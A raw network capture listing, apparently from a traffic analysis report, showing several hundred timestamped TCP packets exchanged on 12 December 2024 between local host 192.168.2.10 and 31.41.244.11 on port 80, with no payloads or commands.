Dec 12, 2024 16:48:11.620982885 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.622785091 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.622874975 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.622904062 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.622961998 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.627365112 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.627419949 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.627604008 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.627753019 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.632024050 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.632092953 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.632116079 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.632169008 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.636385918 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.636430025 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.636499882 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.636569977 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.640927076 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.640954971 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.640980959 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.640993118 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.645639896 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.645714045 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.645754099 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.645798922 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.650002003 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.650068998 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.650083065 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.650188923 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.654520988 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.654619932 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.654665947 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.654706001 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.659046888 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.659112930 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.659161091 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.659205914 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.663563967 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.663729906 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.663949013 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.663949013 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.668123007 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.668137074 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.668186903 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.672725916 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.672811031 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.672835112 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.672884941 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.677120924 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.677225113 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.677270889 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.677320957 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.681669950 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.681816101 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.682172060 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.682172060 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.686207056 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.686302900 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.686374903 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.686439037 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.690728903 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.690781116 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.691338062 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.691338062 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.695300102 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.695496082 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.696218967 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.696218967 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.699819088 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.699908018 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.702017069 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.702017069 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.704586983 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.704677105 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.704701900 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.704783916 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.708827019 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.708915949 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.708925962 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.709003925 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.713498116 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.713556051 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.713587999 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.714092016 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.717849970 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.717968941 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.717969894 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.718035936 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.740756035 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.740772963 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.741014957 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.813101053 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.813122034 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.813255072 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.814599991 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.814673901 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.814706087 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.814742088 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.818021059 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.818108082 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.818164110 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.818393946 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.821721077 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.821901083 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.822402000 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.822402000 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.825269938 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.825455904 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.825799942 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.825799942 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.828802109 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.828861952 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.828879118 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.830080032 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.832323074 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.832402945 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.832442999 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.833121061 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.835604906 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.835684061 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.835701942 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.835762024 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.838923931 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.839095116 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.839123964 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.839216948 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.842211962 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.842304945 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.842433929 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.842433929 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.845333099 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.845402002 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.845442057 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.845494032 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.848345995 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.848628998 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.848666906 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.848733902 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.851492882 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.851577044 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.851640940 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.851716042 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.854516029 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.854600906 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.854609013 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.855336905 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.857633114 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.857719898 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.857726097 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.857984066 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.860686064 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.860786915 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.860831976 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.860946894 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.863770008 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.863816023 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.863859892 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.863946915 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.866884947 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.866940022 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.866983891 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.867176056 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.869999886 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.870088100 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.870112896 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.870188951 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.871769905 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.871789932 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.871860027 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.871860981 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.873622894 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.873697996 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.873805046 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.873805046 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.875349998 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.875446081 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.875484943 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.875583887 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.877121925 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.877329111 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.877382994 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.877382994 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.878937960 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.879106045 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.879333973 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.879333973 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.880727053 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.880841017 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.880853891 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.881331921 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.882507086 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.882648945 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.882694960 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.882695913 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.884253979 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.884370089 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.884403944 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.884517908 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.886028051 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.886100054 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.886101007 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.886207104 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.887900114 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.887954950 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.887996912 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.888015985 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.889802933 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.889857054 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.890192032 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.890192032 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.891450882 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.891566992 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.891608000 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.891697884 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.893249989 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.893327951 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.893412113 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.893537045 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.895015001 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.895112991 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.895129919 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.895185947 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.896879911 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.896933079 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:11.896941900 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:11.897000074 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.004678965 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.004786015 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.004825115 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.004910946 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.005680084 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.005759001 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.005779982 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.005880117 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.007375002 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.007476091 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.007483959 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.007777929 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.009676933 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.009725094 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.009785891 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.009785891 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.010940075 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.011028051 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.011039019 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.011178017 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.012758970 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.012808084 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.012865067 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.012865067 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.014610052 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.014681101 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.014684916 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.014736891 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.016247988 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.016333103 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.016350031 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.016407013 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.017921925 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.017996073 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.018038988 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.018090010 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.019691944 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.019762039 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.019771099 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.019824028 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.021295071 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.021433115 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.021475077 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.021475077 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.022865057 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.022958994 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.023226023 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.023226023 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.024451017 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.024578094 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.024669886 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.024669886 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.026113987 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.026240110 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.026242971 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.026300907 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.027678013 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.027791023 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.027821064 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.027899981 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.029385090 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.029447079 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.029453039 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.029557943 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.031008005 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.031037092 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.031080961 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.031080961 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.032517910 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.032566071 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.032613993 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.032613993 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.034079075 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.034188986 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.034221888 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.034354925 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.035744905 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.035809994 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.035933018 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.035995007 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.037339926 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.037436008 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.037453890 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.037744999 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.038888931 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.038947105 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.038970947 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.039007902 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.040524006 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.040628910 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.040692091 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.040692091 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.042182922 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.042237997 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.042252064 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.042324066 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.043716908 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.043843031 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.043899059 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.043899059 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.045409918 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.045427084 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.045454025 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.045502901 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.046906948 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.046972990 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.047024965 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.047132969 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.048573971 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.048638105 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.048654079 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.048841953 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.050139904 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.050196886 CET	49858	80	192.168.2.10	31.41.244.11
